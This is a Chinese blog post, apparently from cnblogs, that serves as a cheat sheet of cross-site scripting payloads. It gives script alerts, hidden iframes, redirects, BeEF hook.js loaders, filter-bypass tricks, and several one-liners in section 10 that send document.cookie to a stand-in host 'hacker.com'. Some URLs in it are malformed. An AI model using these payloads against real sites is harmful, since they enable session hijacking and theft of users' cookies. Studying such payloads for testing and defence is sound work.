随笔 - 633,  文章 - 0,  评论 - 13,  阅读 - 48万
< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5

1.对输入的<>/进行处理后,可预防xss攻击

  反射型xss: 一般是查询输入框中招,将代有木马参数的url发送给某用户,用户点击后即中招

  存储型xss:输入并存储在页面,一般如留言框中招;

       domxss:在URL的哈西值部分(即URL#号后的部分)植入xss攻击

2.在输入框中输入:

  <script> alert(‘xss’)</script>

  出现弹框,显示xss,说明存在xss攻击漏洞,可以进行xss攻击

3.弹框形势有:

  <script> alert(‘xss’)</script>

  <script> alert(document.cookie)</script>

  其中document.cookie可以获取当前浏览器的cookie

4.页面嵌套:

  <iframe src=http://www.baidu.com width=300 height=300></iframe>

  <iframe src=http://www.baidu.com width=0 height=0></iframe>   :这个比上一个更隐蔽,引文边框为0.不易察觉

5.页面重定向:

  <script> window.location="http://www/baidu.com"</script>

  <script> location.href="http://www/baidu.com"</script>

6.弹框警告并重定向:

  <script> alert(‘请移步到我们的新站’);location.href="http://www/baidu.com"</script>

  <script> alert(‘xss’);location.href="http://www/baidu.com/robots.txt"</script>

7.访问恶意代码:

  <script src="http://BeFF_IP:3000/hook.js"></script>      :结合BeFFS收集用户的信息

8.巧用图片标签

  <img src="#" onerror=alert("xss")>    :#不是有效的图片资源,导致图片加载失败,进而触发了oneerror事件,弹出alert弹框,触发CSS攻击

  <img src=“javaScript:alert('xss');">

  <img src="http://BeFF_IP:3000/hook.js"></img>

9.绕开过滤的脚本:

  大小写 <ScrIpt> alert(‘xss’)</SCRipt>

  字符编码 采用url、Base64等编码 <a href="经过编码后的url"></a>

10.收集用户cookie

  打开新窗口并且采用本地cookie访问目标网,打开心窗口并且采用本地cookie访问目标网页。

    <script> window.open("http://www/hacker.com/cookie.php?cookie="+document.cookie)</script>

    <script> window.location="http://www/hacker.com/cookie.php?cookie="+document.cookie</script>

    <script> new Image().src="http://www/hacker.com/cookie.php?cookie="+document.cookie;</script>

    <img src="http://www/hacker.com/cookie.php?cookie="+document.cookie></img>

    <iframe src="http://www/hacker.com/cookie.php?cookie="+document.cookie ></iframe>

    <script>new Image().src="http://www/hacker.com/cookie.php?cookie="+document.cookie;

    img.width = 0;

    img.height = 0;

    </script>

11.BeFF xss自动化攻击

  

posted on   大话人生  阅读(283)  评论(0编辑  收藏  举报
编辑推荐:
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构
点击右上角即可分享
微信分享提示